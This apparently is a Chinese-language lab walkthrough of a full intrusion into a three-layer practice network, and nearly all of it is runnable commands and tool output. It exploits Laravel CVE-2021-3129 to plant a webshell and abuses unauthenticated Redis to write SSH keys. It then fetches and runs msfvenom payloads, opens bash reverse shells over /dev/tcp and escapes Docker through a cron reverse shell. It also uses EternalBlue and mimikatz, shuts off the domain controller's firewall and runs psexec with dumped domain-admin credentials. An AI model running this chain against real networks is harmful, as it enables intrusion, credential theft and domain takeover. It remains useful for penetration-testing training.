前记
所用工具
- msf
- cs
- venom
- frp
- 蚁剑
- 冰蝎
- laravel.py
- fscan
注意事项
- msf的永恒之蓝每次都需要两次才能成功,即第二次才能成功,不成功可以多试试
- 为模拟真实渗透环境,搭建了一层vps环境
- 第二层内网本该出网的,为增加难度设置为不出网
环境配置
vm1,vm2,vm3均不出网
kali:192.168.123.128(vm3)
vps:192.168.123.129(vm3)
web1:192.168.52.10(vm1)
192.168.123.243(vm3)
web2:192.168.52.20(vm1)
192.168.93.10(vm2)
win7(PC1):192.168.52.30(vm1)
192.168.93.20(vm2)
win7(PC2):192.168.93.40(vm2)
DC:192.168.93.30(vm2)
其他信息
scss
DMZ区域:
给Ubuntu (Web 1) 配置了两个网卡,一个可以对外提供服务;一个连接第二层网络。
第二层网络区域:
给Ubuntu (Web 2) 和Windows 7 (PC 1)都配置了两个网卡,一个连接第二层网络,一个连接第三层网络。
第三次网络区域:
给Windows Server 2012和Windows 7 (PC 2)都只配置了一个网卡,连接第三层网络。
Administrator:Whoami2021
bunny:Bunny2021
moretz:Moretz2021
Ubuntu 1: ubuntu:web2021
Ubuntu 2: ubuntu:ubuntu
通达OA账户: admin:admin657260
DMZ区的 Ubuntu 需要启动nginx服务:
sudo redis-server /etc/redis.conf
sudo /usr/sbin/nginx -c /etc/nginx/nginx.conf
sudo iptables -F
第二层网络的 Ubuntu需要启动docker容器:
sudo service docker start
sudo docker start 8e172820ac78
第三层网络的 Windows 7 (PC 1)需要启动通达OA:
C:\MYOA\bin\AutoConfig.exe
web1
信息搜集
sudo nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 512 --host-timeout 30 -T3 -v -oG result.txt --script http-methods --script-args http.useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0" 192.168.123.243 -p 0-65535
arduino
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
6379/tcp open redis
22可以爆破ssh
80无法访问,81是一个Laravel框架
6379可尝试未授权访问、弱口令爆破
less
./fscan -h 192.168.123.243
[+] Redis:192.168.123.172:6379 unauthorized file:/home/web/dump.rdb
[+] Redis:192.168.123.172:6379 like can write /root/.ssh/
[+] Redis:192.168.123.172:6379 like can write /var/spool/cron/
[*] WebTitle: http://192.168.123.172 code:404 len:548 title:404 Not Found
[*] WebTitle: http://192.168.123.172:81 code:200 len:17474 title:Laravel
[+] InfoScan: http://192.168.123.172:81 [Laravel]
[+] http://192.168.123.172:81 poc-yaml-laravel-cve-2021-3129
redis未授权,laravel存在cve
ini
whatweb http://192.168.123.243:81/
发现这里是nginx中间件
http://192.168.123.243:81/ [200 OK] Cookies[XSRF-TOKEN,laravel_session], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)], HttpOnly[laravel_session], IP[192.168.123.243], Laravel, PHP[7.4.14], Title[Laravel], X-Powered-By[PHP/7.4.14], nginx[1.14.0]
cve-2021-3129
先从81的Laravel框架漏洞入手
perl
python laravel.py -u http://192.168.123.243:81/
python laravel.py -u http://192.168.123.243:81/ --exp
成功写入webshell, 访问地址 http://192.168.123.243:81/shell.php , 密码 whoami
拿到shell,为www权限
bash
ls -alh /.dockerenv 非docker环境,一般没有这个.dockerenv文件
cat /proc/1/cgroup
cat /proc/self/status | grep CapEff
发现是docker,非特权模式开启的。先放着看看6379端口
redis未授权|ssh密钥
(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;
(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。
探测漏洞
yaml
python2 redis.py 192.168.123.243 6379
探测确实存在漏洞
利用漏洞
bash
sudo su root
ssh-keygen -t rsa #生成公钥
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > 1.txt
cat 1.txt | redis-cli -h 192.168.123.243 -p 6379 -x set hello
redis-cli -h 192.168.123.243
config set dir /root/.ssh
config set dbfilename authorized_keys
save
cd /root/.ssh/
ssh -i id_rsa root@192.168.123.243
后渗透
目标机器为linux,我们通过frp反向代理到vps,上线msf
frp配置
ini
[common]
server_addr = 192.168.123.129
server_port = 9876
tls_enable = true
token = coleak
[CS_Server_6666]
type = tcp
local_ip = 127.0.0.1
local_port = 6666
remote_port = 6666
[Beacon]
type = tcp
local_ip = 127.0.0.1
local_port = 6667
remote_port = 6667
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 7777
remote_port = 7777
[cs->msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4566
remote_port = 4566
[server]
type = tcp
local_ip = 127.0.0.1
local_port = 80
remote_port = 8888
上线msf
bash
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.123.129 LPORT=7777 -f elf > shell.elf
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 7777
show options
set AutoRunScript migrate -f
set PrependMigrate true
exploit
python -m http.server 80
wget http://192.168.123.129:8888/shell.elf
chmod +x shell.elf
./shell.elf
上线cs
bash
监听https端口,6667
./genCrossC2.Linux 192.168.123.129 6667 .cobaltstrike.beacon_keys null Linux x64 /home/coleak/桌面/CrossC2-test
python -m http.server 80
wget http://192.168.123.129:8888/CrossC2-test
chmod +x CrossC2-test
Venom
bash
agent监听端口,admin发起连接
wget http://192.168.123.129:8888/agent_linux_x64
./agent_linux_x64 -lport 8888
./admin_linux_x64 -rhost 192.168.123.243 -rport 8888
这里我们先把fscan上传到目标机器,对内网进行扫描
bash
wget http://192.168.123.129:8888/fscan_amd64
chmod +x fscan_amd64
./fscan_amd64 -h 192.168.52.0/24
kotlin
(icmp) Target 192.168.52.10 is alive
(icmp) Target 192.168.52.20 is alive
(icmp) Target 192.168.52.30 is alive
[*] Icmp alive hosts len is: 3
192.168.52.10:8888 open
192.168.52.20:8000 open
192.168.52.30:8080 open
192.168.52.30:445 open
192.168.52.30:139 open
192.168.52.30:135 open
192.168.52.20:22 open
192.168.52.10:22 open
192.168.52.10:81 open
192.168.52.10:80 open
[*] alive ports len is: 10
start vulscan
[+] 192.168.52.30 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] NetBios: 192.168.52.30 PC1.whoamianony.org Windows 7 Professional 7601 Service Pack 1
[*] WebTitle: http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统
[+] InfoScan:http://192.168.52.30:8080 [通达OA]
[+] http://192.168.52.30:8080 tongda-user-session-disclosure
[*] WebTitle: http://192.168.52.10 code:404 len:548 title:404 Not Found
[*] WebTitle: http://192.168.52.20:8000 code:200 len:17474 title:Laravel
[+] InfoScan:http://192.168.52.20:8000 [Laravel]
尝试MS17-010永恒之蓝进入win7
至于52.20这台机器从8000和22端口入手
这里查看nginx配置文件
bash
nginx -t
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
cd /etc/nginx/conf.d/
cat 80
server {
listen 80;
server_name www.whopen.com;
location / {
proxy_pass https://whoamianony.top/;
}
}
cat 81
server {
listen 81;
server_name localhost;
location / {
proxy_pass http://192.168.52.20:8000;
}
}
外网81服务是内网8000进行Nginx反代出来的
Win7(PC1)
永恒之蓝
bash
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.52.30
set RPORT 445
set lport 8526
setg Proxies socks5:127.0.0.1:9999
setg ReverseAllowProxy true
run
拿到web2的system权限,由于是windows,,所以上线cs操作
通过frp上线pc1到cs
在web1上开启s端
ini
[common]
bind_port = 6789
在vps开启c端
ini
[common]
server_addr = 192.168.123.243
server_port = 6789
[Beacon]
type = tcp
local_ip = 127.0.0.1
local_port = 6667
remote_port = 6667
注意我们已经将kali的6667和vps的6667关联,所以其实web1的6667最终流量会到达kali,注意监听器需要设置为web1的内网ip,通过http连接
arduino
upload beacon1.exe c://Python27
shell
chcp 65001
beacon1.exe
web2
根据之前对nginx配置分析得知
bash
http://192.168.123.243:81/shell.php , 密码 whoami
直接访问http://192.168.52.20:8000/shell.php
上线为www权限,还在docker中,考虑提权再逃逸
bash
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/home/jobs/shell
/bin/mount
/bin/su
/bin/umount
反弹shell,这里需要将kali的监听端口转发到web1上,然后让web2来连接web1
yaml
nc -lvp 3443
lforward 127.0.0.1 3443 3443
bash -c "bash -i >& /dev/tcp/192.168.52.10/3443 0>&1"
依次查找相关信息,发现shell可能存在漏洞,执行了ps命令
PID TTY TIME CMD 1 ? 00:00:00 apache2 119 ? 00:00:00 shell 120 ? 00:00:00 sh 121 ? 00:00:00 ps
bash
cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /home/jobs
./shell
通过suid提权成功拿到root权限
docker逃逸
检测是否为特权模式开启
bash
cat /proc/self/status | grep CapEff
以特权模式启动的话,CapEff 对应的掩码值应该为0000003fffffffff 或者是 0000001fffffffff
监听3445端口,并端口转发到web1
yaml
nc -lvp 3445
lforward 127.0.0.1 3445 3445
设置定时任务将宿主机反弹shell到web1,再到kali
bash
fdisk -l
mkdir /hacker
mount /dev/sda1 /hacker
touch /hacker/hacker.sh
echo "bash -i >& /dev/tcp/192.168.52.10/3445 0>&1" >/hacker/hacker.sh
echo "* * * * * root bash /hacker.sh" >> /hacker/etc/crontab
成功拿下web2的root权限
win7(PC2)|DC
通过win7(pc1)横向渗透,抓取hash和明文可以抓取到域内用户bunny的密码值,上传fscan对93c段进行扫描
shell C:\Python27\fscan64.exe -h 192.168.93.0/24 > 11.txt
download C:\Python27\11.txt
下载后放在目录/home/coleak/桌面/cs4.7by_mht_vip/downloads/中
less
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.93.20 is alive
(icmp) Target 192.168.93.30 is alive
(icmp) Target 192.168.93.40 is alive
[*] Icmp alive hosts len is: 3
192.168.93.20:445 open
192.168.93.40:139 open
192.168.93.30:88 open
192.168.93.20:8080 open
192.168.93.40:445 open
192.168.93.30:445 open
192.168.93.30:139 open
192.168.93.40:135 open
192.168.93.30:135 open
192.168.93.20:139 open
192.168.93.20:135 open
[*] alive ports len is: 11
start vulscan
[+] 192.168.93.20 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] NetInfo:
[*]192.168.93.30
[->]DC
[->]192.168.93.30
[+] 192.168.93.40 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] 192.168.93.30 MS17-010 (Windows Server 2012 R2 Datacenter 9600)
[*] NetBios: 192.168.93.40 PC2.whoamianony.org Windows 7 Professional 7601 Service Pack 1
[*] NetBios: 192.168.93.30 [+]DC DC.whoamianony.org Windows Server 2012 R2 Datacenter 9600
[*] WebTitle: http://192.168.93.20:8080 code:200 len:10065 title:通达OA网络智能办公系统
[+] InfoScan:http://192.168.93.20:8080 [通达OA]
[+] http://192.168.93.20:8080 tongda-user-session-disclosure
已完成 11/11
[*] 扫描结束,耗时: 15.9012269s
发现DC和win7-2均存在MS17-010永恒之蓝,上线venom
arduino
goto 1
listen 8081
shell C:\Python27\agent.exe -rhost 192.168.52.10 -rport 8081
goto 2
socks 19999
通过msf上线
bash
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.93.30
set RPORT 445
set lport 8527
setg Proxies socks5:127.0.0.1:19999
setg ReverseAllowProxy true
run
这里域控上线失败了,但是win7-2成功!
arduino
migrate 1316
load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords
成功抓到域用户和域管理员的密码
- bunny:Bunny2021
- administrator:Whoami2021
通过转发上线设置一个pc1的中转监听器,生成exe,上线cs
arduino
upload beacon2.exe c://MYOA
在win7上关闭dc的防火墙
sql
net use \192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"
sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall
psexec到dc
bash
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
set smbuser administrator
set smbpass Whoami2021
setg Proxies socks5:127.0.0.1:19999
setg ReverseAllowProxy true
run